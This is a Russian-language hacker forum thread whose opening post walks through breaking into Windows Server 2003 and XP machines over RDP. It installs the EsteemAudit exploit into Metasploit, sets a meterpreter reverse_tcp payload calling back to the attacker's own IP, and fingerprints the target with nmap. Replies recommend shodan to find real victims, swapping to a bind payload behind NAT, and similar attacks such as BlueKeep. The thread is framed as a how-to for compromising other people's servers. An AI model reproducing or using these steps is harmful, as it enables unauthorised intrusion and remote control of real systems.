Статья Взлом RDP windows 2017

Приветствую всех, отважился я на такой поступок как по балывать паблик)) (пабликом) по делится с Вами новым приёмом хека дедика, а именно: Windows Server 2003 SP1,SP2 и Windows XP SP0, SP1, SP3

Для начала нам по требуется скачать експлойт и установить его в Metasploit создав специальную для него папку в каталоге метасплойта: (все команды выполняем находясь в данной папке!)

mkdir /opt/metasploit-framework/modules/exploits/windows/rdp

затем копируем руби скрипт в эту же папку командой:

cp esteemaudit.rb /opt/metasploit-framework/modules/exploits/windows/rdp/

Для работы скрипта по требуются еще и файлы:

mkdir /usr/share/esteemaudit

копируем все в созданную нами папку:

cd files

cp * /usr/share/esteemaudit/

Запускаем Metasploit и настраиваемся на этот експлойт посмотрев его настройки.

задаем атакуемый RHOST

и нагрузку: set PAYLOAD windows/meterpreter/reverse_tcp

и конечно же наладим обратную связь: set LHOST <свой IP>

и ВАЖНО еще настроить експлойт, задать версию ОС windows для него, предварительно узнав какие версии он поддерживает командой: show TARGETS

а вообще узнать какую ОС мы атакуем можно с помощью сканера NMAP командой:

nmap -sS -sC -sV -O -p3389 <атакуемый_IP>

и, exploit


Удачи!..) и хех, помните мою доброту!))

 

[Mitistofel]

armitage, cobalt или еще что там....позволяет производить атаку только на единичную цель....на сколько я знаю...может быть можно присобачить какие то модули для массовой атаки..... но я так глубоко не копал...))))

Если можно будет сделать, что бы одновременно выполнялось сразу много функций даже для одной цели - меня это устраивает. Значит надо покопать в сторону "armitage, cobalt"

 

[⚡️absolute❤evil⚡️]

Приветствую всех, отважился я на такой поступок как по балывать паблик)) (пабликом) по делится с Вами новым приёмом хека дедика, а именно: Windows Server 2003 SP1,SP2 и Windows XP SP0, SP1, SP3

Чувак, ты все свои фокусы на всоём компутере проделываешь ?
В виртуальной сети ?

Ничего ты таким способом не сломаешь в реальноси.
Статья - пустышка.
Расчитана на дешёвый автортет

 

[x10]

Простите за нубский вопрос этот тест за NATom можно осуществить?
Спасибо

 

[Demi]

Чувак, ты все свои фокусы на всоём компутере проделываешь ?
В виртуальной сети ?

Ничего ты таким способом не сломаешь в реальноси.
Статья - пустышка.
Расчитана на дешёвый автортет

Я не был бы на Вашем месте столь голословным, shodan Вам в помощь в поиске таргетов, лично могу гарантировать работу данного инструмента и далеко за пределами локальной сети !

Простите за нубский вопрос этот тест за NATom можно осуществить?
Спасибо

Да возможно, но тогда меняй payload с reverse на bind, а там уже как карта ляжет

 

[Mitistofel]

Ничего ты таким способом не сломаешь в реальноси.
Статья - пустышка.
Расчитана на дешёвый автортет

Ты голословен...

 

[Metasploit]

Безграмотное название статьи: >
нет в природе такой OS (windows 2017) , а rdp это протокол , ну ТС каким то образом умудрился слипить это всё вместе ...

 

[Ondrik8]

ТС просто указал способ взлома 17-ого года))

 

[IB Ib]

добрая дюжина юзверей-полная дичь)))публикация вообще на кого нацелена?на людей со сковородками?)

 

[lomini]

Нормальная статья , что вы на парня накинулись , новичкам самое то.

 

[Ondrik8]

ну а что мне тебе описать ... перехват NTLM хеша, внедрение команды WMIс , заливка PSexec, SharpExec открытие бэкдора в чужой сети?
так то уже есть инструмент PivotSuite, а потом читателям сухари сушить?)

 

[lomini]

Автор давай еще статей - повышай уровень знаний населения =)
Кстати с bluekeepом тоже самое можно сделать по аналогии )

 

[Ondrik8]

Автор давай еще статей - повышай уровень знаний населения =)
Кстати с bluekeepом тоже самое можно сделать по аналогии )

ondrik8.github.io